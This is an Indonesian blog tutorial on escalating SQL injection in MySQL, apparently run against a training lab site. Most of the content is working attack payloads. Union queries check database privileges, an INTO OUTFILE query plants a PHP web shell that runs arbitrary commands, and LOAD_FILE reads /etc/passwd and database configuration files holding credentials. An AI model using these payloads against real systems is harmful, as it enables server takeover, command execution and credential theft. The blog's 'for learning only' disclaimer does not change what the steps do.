Tutorial SQL Injection Load File dan Into Outfile

Tutorial SQL Injection Load File dan Into Outfile - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Tutorial SQL Injection Load File dan Into Outfile, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Tutorial SQL Injection Load File dan Into Outfile. Selain untuk melihat isi dari database target, SQL injection bisa dieksplorasi lebih jauh, misalnya untuk melihat file di web server, ataupun untuk menambahkan file di webserver. Ya tentu saja kita harus punya privilege yang cukup.


Saya anggap kalian sudah membaca artikel saya tentang SQL Injection manual. Sehingga disini saya langsung skip ke injeksi setelah menemukan magic number. Anggap disini saya menggunakan nomor ajaib 2.


Step 1 – Memeriksa Hak Akses


Disini kita harus melihat terlebih dahulu user database yang digunakan.



  • 1337′ union select 1,user(),3,4,5#


Tutorial


root@localhost. Bagus, user root. Kita bisa konfirmasi sekali lagi dengan query untuk mengecek file_priv.



  • 1337′ union select 1,group_concat(user,0x3a,file_priv),3,4,5 FROM mysql.user#


Tutorial


Step 2 – Eksekusi Into Outfile


Untuk eksekusi query into outfile, kita harus tau path dimana web target tersebut berada. Kita bisa cek dari error yang ditampilkan.


Tutorial


Terlihat path error nya ada di /usr/share/nginx/evillabs/SQLi/Himameka2019/ .


Query into outfile nya



  • 1337′ union select 1,”<?php var_dump($_GET[‘a’]($_GET[‘b’])); ?>“,3,4,5 into outfile “/usr/share/nginx/evillabs/SQLi/Himameka2019/exp.php” #


Disini file barunya saya beri nama exp.php .


Muncul error? Tidak masalah. Sekarang langsung kita akses path shell nya.



  • https://labs.evil-security.com/SQLi/Himameka2019/exp.php


Eksekusi shell nya



  • https://labs.evil-security.com/SQLi/Himameka2019/exp.php?a=systemb=ls%20-lha


Tutorial


Tutorial


Oke. Kalian berhasil mengupload shell ke web target menggunakan query into outfile. Langkah ini lebih praktis daripada kita harus melakukan cracking password user ataupun susah susah mencari halaman login yang entah ketemu entah tidak.


Step 3 – Eksekusi Load File


Selain untuk menambahkan file ke web target, SQL injection juga bisa digunakan untuk melihat isi dari file yang ada di web target tersebut. Ya tentunya langkah ini tidak diperlukan lagi jika kalian sudah berhasil mengupload shell ke web target. Namun tidak ada salahnya kalian untuk tau.


Memeriksa isi /etc/passwd



  • 1337′ union select 1,load_file(“/etc/passwd“),3,4,5#


Tutorial


Memeriksa file config database.


Pertama, kita periksa file yang menunjukkan pesan error, yang dalam hal ini adalah file index.php.



  • 1337′ union select 1,load_file(“/usr/share/nginx/evillabs/SQLi/Himameka2019/index.php“),3,4,5#


Tutorial


Sekarang kita tau bahwa config database nya ada di file database.php .



  • 1337′ union select 1,load_file(“/usr/share/nginx/evillabs/SQLi/Himameka2019/database.php“),3,4,5#


Tutorial


 


Baiklah mungkin itu saja tutorial kali ini, semoga bermanfaat. Jika ada yang ingin ditanyakan silahkan tinggalkan komentar.


 



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Tutorial SQL Injection Load File dan Into Outfile.
Terima kasih telah membaca artikel Tutorial SQL Injection Load File dan Into Outfile, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Tutorial SQL Injection Load File dan Into Outfile"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel